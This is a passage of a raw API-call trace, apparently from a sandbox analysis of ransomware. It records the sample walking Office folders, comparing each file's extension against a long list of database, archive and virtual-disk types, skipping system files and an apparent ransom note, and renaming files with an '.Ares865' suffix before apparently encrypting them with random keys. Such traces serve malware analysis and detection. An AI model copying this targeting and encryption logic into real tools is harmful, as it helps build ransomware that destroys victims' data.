returned -1 [0086.869] lstrlenW (lpString="vis") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.869] lstrlenW (lpString="vpd") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.869] lstrlenW (lpString="vvv") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.869] lstrlenW (lpString="wdb") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.869] lstrlenW (lpString="wmdb") returned 4 [0086.869] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.869] lstrlenW (lpString="wrk") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.869] lstrlenW (lpString="xdb") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.869] lstrlenW (lpString="xld") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.869] lstrlenW (lpString="xmlff") returned 5 [0086.869] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.869] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.Ares865") returned 80 [0086.869] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.871] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.871] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26976) returned 1 [0086.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.871] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.872] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.872] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.872] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c60, lpName=0x0) returned 0x15c [0086.875] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c60) returned 0x190000 [0086.877] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.878] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.878] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.879] CloseHandle (hObject=0x15c) returned 1 [0086.879] CloseHandle (hObject=0x118) returned 1 [0086.879] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.879] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.879] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.879] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70273800, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x70273800, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x73960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".") returned 1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="..") returned 1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="windows") returned -1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="temp") returned 1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0086.879] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="boot") returned 1 [0086.880] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.880] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.880] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0086.880] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.880] lstrlenW (lpString="VISINTL.DLL.trx_dll") returned 19 [0086.880] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0086.880] lstrcpyW (in: lpString1=0x2cce468, lpString2="VISINTL.DLL.trx_dll" | out: lpString1="VISINTL.DLL.trx_dll") returned="VISINTL.DLL.trx_dll" [0086.880] lstrlenW (lpString="VISINTL.DLL.trx_dll") returned 19 [0086.880] lstrlenW (lpString="Ares865") returned 7 [0086.880] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.880] lstrlenW (lpString=".dll") returned 4 [0086.880] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0086.880] lstrlenW (lpString=".lnk") returned 4 [0086.880] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.880] lstrlenW (lpString=".ini") returned 4 [0086.880] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0086.880] lstrlenW (lpString=".sys") returned 4 [0086.880] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0086.880] lstrlenW (lpString="VISINTL.DLL.trx_dll") returned 19 [0086.880] lstrlenW (lpString="bak") returned 3 [0086.880] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.880] lstrlenW (lpString="ba_") returned 3 [0086.880] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.880] lstrlenW (lpString="dbb") returned 3 [0086.880] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.880] lstrlenW (lpString="vmdk") returned 4 [0086.880] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.880] lstrlenW (lpString="rar") returned 3 [0086.880] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.880] lstrlenW (lpString="zip") returned 3 [0086.880] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.880] lstrlenW (lpString="tgz") returned 3 [0086.880] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.880] lstrlenW (lpString="vbox") returned 4 [0086.880] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.880] lstrlenW (lpString="vdi") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.881] lstrlenW (lpString="vhd") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.881] lstrlenW (lpString="vhdx") returned 4 [0086.881] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.881] lstrlenW (lpString="avhd") returned 4 [0086.881] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.881] lstrlenW (lpString="db") returned 2 [0086.881] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.881] lstrlenW (lpString="db2") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.881] lstrlenW (lpString="db3") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.881] lstrlenW (lpString="dbf") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.881] lstrlenW (lpString="mdf") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.881] lstrlenW (lpString="mdb") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.881] lstrlenW (lpString="sql") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.881] lstrlenW (lpString="sqlite") returned 6 [0086.881] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.881] lstrlenW (lpString="sqlite3") returned 7 [0086.881] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.881] lstrlenW (lpString="sqlitedb") returned 8 [0086.881] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.881] lstrlenW (lpString="xml") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.881] lstrlenW (lpString="$er") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.881] lstrlenW (lpString="4dd") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.881] lstrlenW (lpString="4dl") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.881] lstrlenW (lpString="^^^") returned 3 [0086.881] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.882] lstrlenW (lpString="abs") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.882] lstrlenW (lpString="abx") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.882] lstrlenW (lpString="accdb") returned 5 [0086.882] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.882] lstrlenW (lpString="accdc") returned 5 [0086.882] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.882] lstrlenW (lpString="accde") returned 5 [0086.882] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.882] lstrlenW (lpString="accdr") returned 5 [0086.882] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.882] lstrlenW (lpString="accdt") returned 5 [0086.882] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.882] lstrlenW (lpString="accdw") returned 5 [0086.882] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.882] lstrlenW (lpString="accft") returned 5 [0086.882] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.882] lstrlenW (lpString="adb") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.882] lstrlenW (lpString="adb") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.882] lstrlenW (lpString="ade") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.882] lstrlenW (lpString="adf") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.882] lstrlenW (lpString="adn") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.882] lstrlenW (lpString="adp") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.882] lstrlenW (lpString="alf") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.882] lstrlenW (lpString="ask") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.882] lstrlenW (lpString="btr") returned 3 [0086.882] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.882] lstrlenW (lpString="cat") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.883] lstrlenW (lpString="cdb") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.883] lstrlenW (lpString="ckp") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.883] lstrlenW (lpString="cma") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.883] lstrlenW (lpString="cpd") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.883] lstrlenW (lpString="dacpac") returned 6 [0086.883] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.883] lstrlenW (lpString="dad") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.883] lstrlenW (lpString="dadiagrams") returned 10 [0086.883] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.883] lstrlenW (lpString="daschema") returned 8 [0086.883] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.883] lstrlenW (lpString="db-journal") returned 10 [0086.883] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.883] lstrlenW (lpString="db-shm") returned 6 [0086.883] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.883] lstrlenW (lpString="db-wal") returned 6 [0086.883] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.883] lstrlenW (lpString="dbc") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.883] lstrlenW (lpString="dbs") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.883] lstrlenW (lpString="dbt") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.883] lstrlenW (lpString="dbv") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.883] lstrlenW (lpString="dbx") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.883] lstrlenW (lpString="dcb") returned 3 [0086.883] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.883] lstrlenW (lpString="dct") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.884] lstrlenW (lpString="dcx") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.884] lstrlenW (lpString="ddl") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.884] lstrlenW (lpString="dlis") returned 4 [0086.884] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.884] lstrlenW (lpString="dp1") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.884] lstrlenW (lpString="dqy") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.884] lstrlenW (lpString="dsk") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.884] lstrlenW (lpString="dsn") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.884] lstrlenW (lpString="dtsx") returned 4 [0086.884] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.884] lstrlenW (lpString="dxl") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.884] lstrlenW (lpString="eco") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.884] lstrlenW (lpString="ecx") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.884] lstrlenW (lpString="edb") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.884] lstrlenW (lpString="epim") returned 4 [0086.884] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.884] lstrlenW (lpString="fcd") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.884] lstrlenW (lpString="fdb") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.884] lstrlenW (lpString="fic") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.884] lstrlenW (lpString="flexolibrary") returned 12 [0086.884] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.884] lstrlenW (lpString="fm5") returned 3 [0086.884] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.885] lstrlenW (lpString="fmp") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.885] lstrlenW (lpString="fmp12") returned 5 [0086.885] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.885] lstrlenW (lpString="fmpsl") returned 5 [0086.885] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.885] lstrlenW (lpString="fol") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.885] lstrlenW (lpString="fp3") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.885] lstrlenW (lpString="fp4") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.885] lstrlenW (lpString="fp5") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.885] lstrlenW (lpString="fp7") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.885] lstrlenW (lpString="fpt") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.885] lstrlenW (lpString="frm") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.885] lstrlenW (lpString="gdb") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.885] lstrlenW (lpString="gdb") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.885] lstrlenW (lpString="grdb") returned 4 [0086.885] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.885] lstrlenW (lpString="gwi") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.885] lstrlenW (lpString="hdb") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.885] lstrlenW (lpString="his") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.885] lstrlenW (lpString="ib") returned 2 [0086.885] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.885] lstrlenW (lpString="idb") returned 3 [0086.885] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.885] lstrlenW (lpString="ihx") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.886] lstrlenW (lpString="itdb") returned 4 [0086.886] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.886] lstrlenW (lpString="itw") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.886] lstrlenW (lpString="jet") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.886] lstrlenW (lpString="jtx") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.886] lstrlenW (lpString="kdb") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.886] lstrlenW (lpString="kexi") returned 4 [0086.886] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.886] lstrlenW (lpString="kexic") returned 5 [0086.886] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.886] lstrlenW (lpString="kexis") returned 5 [0086.886] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.886] lstrlenW (lpString="lgc") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.886] lstrlenW (lpString="lwx") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.886] lstrlenW (lpString="maf") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.886] lstrlenW (lpString="maq") returned 3 [0086.886] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.887] lstrlenW (lpString="mar") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.887] lstrlenW (lpString="marshal") returned 7 [0086.887] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.887] lstrlenW (lpString="mas") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.887] lstrlenW (lpString="mav") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.887] lstrlenW (lpString="maw") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.887] lstrlenW (lpString="mdbhtml") returned 7 [0086.887] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.887] lstrlenW (lpString="mdn") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.887] lstrlenW (lpString="mdt") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.887] lstrlenW (lpString="mfd") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.887] lstrlenW (lpString="mpd") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.887] lstrlenW (lpString="mrg") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.887] lstrlenW (lpString="mud") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.887] lstrlenW (lpString="mwb") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.887] lstrlenW (lpString="myd") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.887] lstrlenW (lpString="ndf") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.887] lstrlenW (lpString="nnt") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.887] lstrlenW (lpString="nrmlib") returned 6 [0086.887] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.887] lstrlenW (lpString="ns2") returned 3 [0086.887] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.888] lstrlenW (lpString="ns3") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.888] lstrlenW (lpString="ns4") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.888] lstrlenW (lpString="nsf") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.888] lstrlenW (lpString="nv") returned 2 [0086.888] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.888] lstrlenW (lpString="nv2") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.888] lstrlenW (lpString="nwdb") returned 4 [0086.888] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.888] lstrlenW (lpString="nyf") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.888] lstrlenW (lpString="odb") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.888] lstrlenW (lpString="odb") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.888] lstrlenW (lpString="oqy") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.888] lstrlenW (lpString="ora") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.888] lstrlenW (lpString="orx") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.888] lstrlenW (lpString="owc") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.888] lstrlenW (lpString="p96") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.888] lstrlenW (lpString="p97") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.888] lstrlenW (lpString="pan") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.888] lstrlenW (lpString="pdb") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.888] lstrlenW (lpString="pdm") returned 3 [0086.888] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.888] lstrlenW (lpString="pnz") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.889] lstrlenW (lpString="qry") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.889] lstrlenW (lpString="qvd") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.889] lstrlenW (lpString="rbf") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.889] lstrlenW (lpString="rctd") returned 4 [0086.889] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.889] lstrlenW (lpString="rod") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.889] lstrlenW (lpString="rodx") returned 4 [0086.889] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.889] lstrlenW (lpString="rpd") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.889] lstrlenW (lpString="rsd") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.889] lstrlenW (lpString="sas7bdat") returned 8 [0086.889] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.889] lstrlenW (lpString="sbf") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.889] lstrlenW (lpString="scx") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.889] lstrlenW (lpString="sdb") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.889] lstrlenW (lpString="sdc") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.889] lstrlenW (lpString="sdf") returned 3 [0086.889] lstrcmpiW 